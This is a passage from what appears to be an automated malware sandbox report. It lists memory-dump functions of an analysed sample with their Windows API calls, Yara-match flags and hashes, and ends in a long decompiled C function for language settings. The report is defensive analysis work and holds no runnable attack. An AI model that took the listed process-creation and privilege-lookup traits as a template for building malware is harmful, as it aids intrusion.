                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01EDFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01EDFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686009191.0000000001ED0000.00000040.00000001.sdmp, Offset: 01EC0000, based on PE: true
                                                • Associated: 00000009.00000002.686000487.0000000001EC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686138972.0000000001FB0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686146706.0000000001FC0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686155982.0000000001FC4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686164768.0000000001FC7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686173391.0000000001FD0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000009.00000002.686220673.0000000002030000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00096ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                • Instruction ID: 5db4347087e42a734f46b48b741abacaa776633d3b9bc2b08fdfc74665a15ccb
                                                • Opcode Fuzzy Hash: 819bee04a7e7d6e057f1c6dcf151a008b2b0b8b0de6c4166cc31338411b0e2c8
                                                • Instruction Fuzzy Hash: 2C318FB1601704ABCB25DF68D8B1FA7B7F8BB48700F00842DF61A9B242D731A945DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00096EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00096F78
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 684a023b4645ec6ffa596f56cf9223cefe449610e4bbfd6b2ed3b1cdf9be08d1
                                                • Instruction ID: bb4b3a83bb19efeff6fa454453aa35e97c9cc51aac3c7fa36ba9db7f7e37485d
                                                • Opcode Fuzzy Hash: 684a023b4645ec6ffa596f56cf9223cefe449610e4bbfd6b2ed3b1cdf9be08d1
                                                • Instruction Fuzzy Hash: 0A2191B1641304ABDB10DFA8D8A1FABB7B8AF48700F10802DF5199B242D371A845DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098449, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: h
                                                • API String ID: 1279760036-818531735
                                                • Opcode ID: f0daaac9932d7a55e4ea936812a61876eb6769454e5defcb1f6520aa57cb4268
                                                • Instruction ID: 5a6060f95b0322023d83f94b83bb301f5f05182951cfb66e90355063b7d8d48b
                                                • Opcode Fuzzy Hash: f0daaac9932d7a55e4ea936812a61876eb6769454e5defcb1f6520aa57cb4268
                                                • Instruction Fuzzy Hash: A3F030762002146BDA24EF98DC85EE7776DEF88750F158559FA485B341C931EA14C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000984B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: ca4d217f012cc94fcc43fd2421e75402d4fc0f5ab2a7c3729c52d23e39852efc
                                                • Instruction ID: 49acb2beb42adc2e88a1e91adbe946d065e29627eed51aa8a2ca28447daf139b
                                                • Opcode Fuzzy Hash: ca4d217f012cc94fcc43fd2421e75402d4fc0f5ab2a7c3729c52d23e39852efc
                                                • Instruction Fuzzy Hash: CBF0A071100204AFDB28DF65CC45EE77B28EF48350F018589F9089B242C631D801CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000984C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 328bf0f62db3d8abc1ce4827b1d9d951b4c8beb809e8fbe3683c68d47cc07640
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 80E01AB12002046BDB14DF59CC45EE777ACAF88750F018554BA0857342CA30E9108AF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                • Instruction ID: 510fcc912754c5bf7b46505b14e642f0217a5f1fce34de7c2b8a5746be955fa1
                                                • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                • Instruction Fuzzy Hash: 8001A731A802287AEB20B6949C43FFF776C6B00B50F140119FF04BA1C2E694690647F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000984F2, Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 8c69b173ec80ca7fd522937f750aced34160b74c43ab1ca831a5d91606ae0580
                                                • Instruction ID: 021079c3abfd17a1919611e505533fbc26046f8192c1279bd0e891f865c560ab
                                                • Opcode Fuzzy Hash: 8c69b173ec80ca7fd522937f750aced34160b74c43ab1ca831a5d91606ae0580
                                                • Instruction Fuzzy Hash: 330122B2204108ABDB14DF98DC85DEBB7B9EF8C350F11C259FA1CAB241D630E901CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0008D3F7, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 0f25f694af4e0fab41f6726e7c323beaab1deca12b96f40760376d5abf12399e
                                                • Instruction ID: 2d73f66b110e87b5c823a0d4de04d6eaf6ac8865cb1daef156a8f7f13297d19c
                                                • Opcode Fuzzy Hash: 0f25f694af4e0fab41f6726e7c323beaab1deca12b96f40760376d5abf12399e
                                                • Instruction Fuzzy Hash: 3801FC716442083ADF20FB64DC46FFB37ACEB55710F054185F84C971D3D670998187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00089B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction ID: cf5d96cfa9e9af59e5533b7ad4aec78180b733f8f6a1309060bc0b03ea090bf5
                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction Fuzzy Hash: FB011EB5E4020DABDF10EBE4ED42FEDB3B8AB54308F0441A5E90897242F631EB14DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: c59b42b6632d0895df0417b4e2b9a8becf80424f8c64f19b9aee7e8aff47414d
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 8101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00097000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: a10df1feb702fcbfc80cc0b9837d0b42c1f8a3d365989195f0edd70b5f0e5c3f
                                                • Instruction ID: f138f83fe331e924e9124e104cecdaa3f41b311c982b532017d89ec97851cdd7
                                                • Opcode Fuzzy Hash: a10df1feb702fcbfc80cc0b9837d0b42c1f8a3d365989195f0edd70b5f0e5c3f
                                                • Instruction Fuzzy Hash: E8E06D333902043AE63065A9AC02FE7B29C8BC1B20F140026FA4DEB2C2D595F80142A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: fbdf59b571a901eefcdfcf86bfa9680329d111587b15b1f5142f710709a765f9
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 02E012B1200208ABDB14EF99CC41EE777ACAF88650F118558BA089B382CA30F9108BF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00098620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0008D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                • Instruction ID: c1cfe86d0508fd5e1fbc3651e45fb5d487ddecafc616ea5c1bf8ba266a155821
                                                • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                • Instruction Fuzzy Hash: E9D0A7717903043BEA10FAA49C03F6733CDAB44B00F494064F948D73C3D960F9004561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 01F08788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E01F08788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01F08460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01EEE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01F0718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01F08460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01F0718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01F08460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01F08460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01F08460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01F0718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01EEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01EE2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01EFE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01EEE2A8(_t322,  &_v68, _v16);
								if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01EFE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01EEE2A8(_t322,  &_v68, _t236);
								if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01F0718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01EEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01EE2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01EFE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01EEE2A8(_v12,  &_v68, _v16);
							if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01EFE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01EEE2A8(_t322,  &_v68, _t269);
							if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01F0718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01EEE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01EE2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01EFE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01EEE2A8(_v12,  &_v68, _v16);
						if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01EFE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01EEE2A8(_t322,  &_v68, _t296);
						if(E01F05553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01EEE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x01f08788
                                                0x01f08788
                                                0x01f08791
                                                0x01f08794
                                                0x01f08798
                                                0x01f0879b
                                                0x01f0879e
                                                0x01f087a1
                                                0x01f087a4
                                                0x01f087a7
                                                0x01f087aa
                                                0x01f087af
                                                0x01f51ad3
                                                0x01f08b0a
                                                0x01f08b0d
                                                0x01f08b13
                                                0x01f08b19
                                                0x01f08b1f
                                                0x01f08b25
                                                0x01f08b2b
                                                0x01f08b31
                                                0x01f08b37
                                                0x01f08b3d
                                                0x01f08b46
                                                0x01f08b46
                                                0x01f087c6
                                                0x01f087d0
                                                0x01f51ae0
                                                0x01f51ae6
                                                0x01f51af8
                                                0x01f51af8
                                                0x01f51afd
                                                0x01f51afe
                                                0x01f51b01
                                                0x01f51b06
                                                0x01f51b06
                                                0x01f087d6
                                                0x01f087f2
                                                0x01f087f7
                                                0x01f08807
                                                0x01f0880a
                                                0x01f0880f
                                                0x01f08810
                                                0x01f08813
                                                0x01f08818
                                                0x01f08818
                                                0x01f0882c
                                                0x01f08831
                                                0x01f08838
                                                0x01f08908
                                                0x01f08920
                                                0x01f089f0
                                                0x01f08a08
                                                0x01f08af6
                                                0x01f08af6
                                                0x01f08af8
                                                0x01f08afb
                                                0x01f51beb
                                                0x01f51beb
                                                0x01f08b04
                                                0x01f51bf8
                                                0x01f51c0e
                                                0x01f51c13
                                                0x01f51c16
                                                0x01f51c16
                                                0x01f51bf8
                                                0x00000000
                                                0x01f08b04
                                                0x01f08a0e
                                                0x01f08a11
                                                0x01f08a14
                                                0x01f08a15
                                                0x01f08a18
                                                0x01f08a22
                                                0x01f08b59
                                                0x01f08a28
                                                0x01f08a3c
                                                0x01f08a3c
                                                0x01f08a42
                                                0x01f51bb0
                                                0x01f51b11
                                                0x01f51b11
                                                0x00000000
                                                0x01f08a48
                                                0x01f08a51
                                                0x01f08a5b
                                                0x01f08a5e
                                                0x01f08a61
                                                0x01f08a69
                                                0x01f08a69
                                                0x01f08a6d
                                                0x00000000
                                                0x00000000
                                                0x01f08a74
                                                0x01f08a7c
                                                0x01f08a7d
                                                0x01f08a91
                                                0x01f08a93
                                                0x01f08a93
                                                0x01f08a98
                                                0x01f08a9b
                                                0x01f08aa1
                                                0x01f08aa1
                                                0x01f08aa4
                                                0x01f08aaa
                                                0x01f08ab1
                                                0x01f08ac5
                                                0x01f08ac7
                                                0x01f08ac7
                                                0x01f08ac5
                                                0x01f08ace
                                                0x01f51bc9
                                                0x01f51bce
                                                0x01f51bd2
                                                0x01f51bd2
                                                0x01f08ad8
                                                0x01f08aeb
                                                0x01f08aeb
                                                0x01f08af0
                                                0x01f08af4
                                                0x00000000
                                                0x01f08af4
                                                0x01f08a42
                                                0x01f08926
                                                0x01f08929
                                                0x01f0892c
                                                0x01f0892d
                                                0x01f08930
                                                0x01f08935
                                                0x01f0893a
                                                0x01f08b51
                                                0x01f08940
                                                0x01f08954
                                                0x01f08954
                                                0x01f0895a
